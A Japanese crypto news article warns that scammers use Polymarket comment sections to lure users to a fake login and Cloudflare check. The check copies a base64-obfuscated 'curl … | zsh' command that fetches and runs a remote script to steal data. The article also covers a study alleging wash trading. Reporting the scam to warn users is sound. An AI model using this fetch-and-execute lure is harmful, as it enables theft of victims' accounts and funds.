最新ニュース
あなたへのおすすめ
週刊
トップの座を維持する

最高の仮想通貨情報をあなたの受信トレイに直接お届けします。.

ポリマーケットのプライベートマーケットにおけるフィッシングリンク:ユーザーが警戒を強める

によるハンナ・コリモアハンナ・コリモア
読了時間3分
ポリマーケットのプライベートマーケットにおけるフィッシングリンク:ユーザーが警戒を強める。.
  • Xのユーザーは、Polymarketのプライベートマーケットがハッカーに悪用されていると主張し、懸念を表明している。. 
  • 報道によると、ハッカーらはポリマーケットのコメント欄を利用して50万ドル以上を盗んだという。.
  • ポリマーケットについては、コロンビア大学の研究者らが、同社の取引量はユーザーの仮装売買によって支えられている、と主張してからわずか数日しか経っていない。. 

ポリマーケットが再び話題になっている。今回は、「25usdc」というあだ名を持つ同社の上級トレーダーの1人が、プラットフォームのコメント欄を利用して何も知らないユーザーを食い物にする計画について警鐘を鳴らしたためだ。. 

これは、Polymarket プラットフォームにとって重要な時期に起こっており、同社は米国市場への再参入の準備を進めており、Kalshi などのライバルに先んじようと奮闘している。. 

ポリマーケットのプライベートマーケットにおけるフィッシングリンク:ユーザーが警戒を強める。.
Polymarketユーザーをフィッシングリンクをクリックさせるハッカーの典型的なメッセージのスクリーンショット。出典: @25usdc、X/Twitter経由

ポリマーケットのトレーダーは警戒を強める 

25usdcによると、ハッカーはPolymarketのコメント欄を利用して詐欺を働いており、これまでにユーザーは50万ドル以上を失っているという。

「彼らはこう言う。『なぜポリマーケットのプライベートマーケットで取引しないんだ?あっちの方がずっと勝率が高いんだ!』」と25usdcは書き、この詐欺の仕組みを説明した。. 

彼によると、すべては2つの別々のアカウントからYes株とNo株の両方を市場で購入することから始まる。こうすることで、「保有者」フィルターが有効になっていても、彼らのコメントは表示される。その後、彼らは難読化された形で自分のサイトのURLを投稿する。.

このURLは、何も知らないユーザーをPolymarketのロゴが入った一見無難なページに誘導し、メールでのログインを要求します。メールアドレスが確認されると、CloudFlareを模倣した新しいウィンドウがポップアップ表示され、ユーザーにアクティビティの確認を求めます。. 

しかし、25usdc によれば、「コピー」をクリックすると、代わりに「curl -kfsSL $(echo 'ENCODED_STRING=='|base64 -d)|zsh」のようなコマンドがコピーされ、ユーザーが誤ってこれを端末に貼り付けた場合、まず最初に base64 でエンコードされた文字列 (サーバー URL) をデコードし、その後そのサーバーからスクリプトを取得してすぐに実行するとのことです。. 

問題のスクリプトにはどんな内容でも含めることができ、ポップアップ警告も表示されないと言われており、その時点で被害は発生しており、25usdc によると唯一の救済策は Wi-Fi をオフにすることかもしれないとのことです。. 

「最終的に、彼らはデータを収集し、システム上のすべての情報を記録し、zipファイルをサーバーに送り返します」と25usdcは記している。「そして、このデータを使ってあなたのアカウントにログインし、お金を盗むのです。」

彼が気づいた他の点としては、このグループの活動がいかに慎重であるかということが挙げられる。例えば、彼らはウォレットを頻繁に切り替えて痕跡を隠蔽したり、あらゆる段階で難読化したり、アクティブな被害者がいないときにはペイロードを送信してログデータを受信するサーバーをシャットダウンしたりしている。.

「この問題に対処する最善の方法は、信頼できるユーザーがコメントをレビューできるようにするか、低評価が多数寄せられた投稿を非表示にする低評価システムを導入することだと思います」と25usdcは結論付け、Polymarketが現在表示している単純な 警告 不十分だと指摘した。 

新たな調査によると、ポリマーケットの取引量はウォッシュトレーディングによって支えられているという。

ように Cryptopolitan が報じた、コロンビア大学の研究者らが最近発表した研究によると、Polymarketにおける取引量はウォッシュトレードによって大幅に水増しされているという。 

著者らが「人為的な取引」と呼ぶものは、時間の経過とともに変化したが、過去3年間のポリマーケットにおける売買全体のうち平均25%を占めていたという。. 

この論文はまだ査読を受けていないが、すでにオープンアクセス研究プラットフォームSSRNに掲載されており、Polymarketによる査読を受けている。. 

明確にしておくと、著者らは Polymarket 自体をウォッシュトレードで直接非難しているわけではない。しかし、彼らはこの取引所の暗号通貨ベースの構造におけるいくつかの要素を指摘し、それがこの主張を裏付ける根拠となっていると述べている。  

また、同社の顧客が、同社の創業者シェイン・コプラン氏が10月8日に発売の可能性を示唆していた独自のデジタルトークンにアクセスするチャンスを高めるために、dentにこのウォッシュトレーディングを行っていた可能性も示唆している。. 

「ポリマーケットが私たちの論文の分析を歓迎してくれることを期待しています」と、コロンビア大学ビジネススクールの教授で、論文の4人の共著者の一人であるヤシュ・カノリア氏はメールで述べた。「仮装取引は市場に流動性や情報を追加するものではないため、本物の取引量と偽物の取引量を区別することは有益だと考えられます。」

ポリマーケットの取引量の一部が本当に「架空の」ものである場合、業界におけるポリマーケットの相対的な強さについての理解が変わり、予測市場は「大勢の知恵」を反映するという現在の考えが揺らぐ可能性があると研究は主張している。

「大規模なウォッシュトレーディングの可能性があることは、特に適切な安全対策が講じられていない可能性のある暗号通貨ベースの取引所では、取引量がプラットフォームの真の活動の指標として信頼できない可能性があることを意味している」と著者らは結論付けている。.

最も賢い暗号通貨マインドを持つ人々はすでに私たちのニュースレターを読んでいます。参加してみませんか?ぜひ ご参加ください

この記事を共有する

免責事項。 提供される情報は取引アドバイスではありません。Cryptopolitan.com Cryptopolitan、 このページで提供される情報に基づいて行われた投資について一切の責任を負いません。tronお勧めしますdent 調査や資格のある専門家への相談を

ハンナ・コリモア

ハンナ・コリモア

ハンナは、暗号資産分野で10年近くにわたりブログ執筆やイベントレポートに携わってきたライター兼エディターです。Cryptopolitan Cryptopolitan、ニュースページに記事を寄稿し、 DeFi、RWA、暗号資産規制、AI、最先端技術産業における最新の動向をレポート・分析しています。アーカディア大学で経営学の学位を取得しています。.

もっと…ニュース
ディープ クリプト
速習コース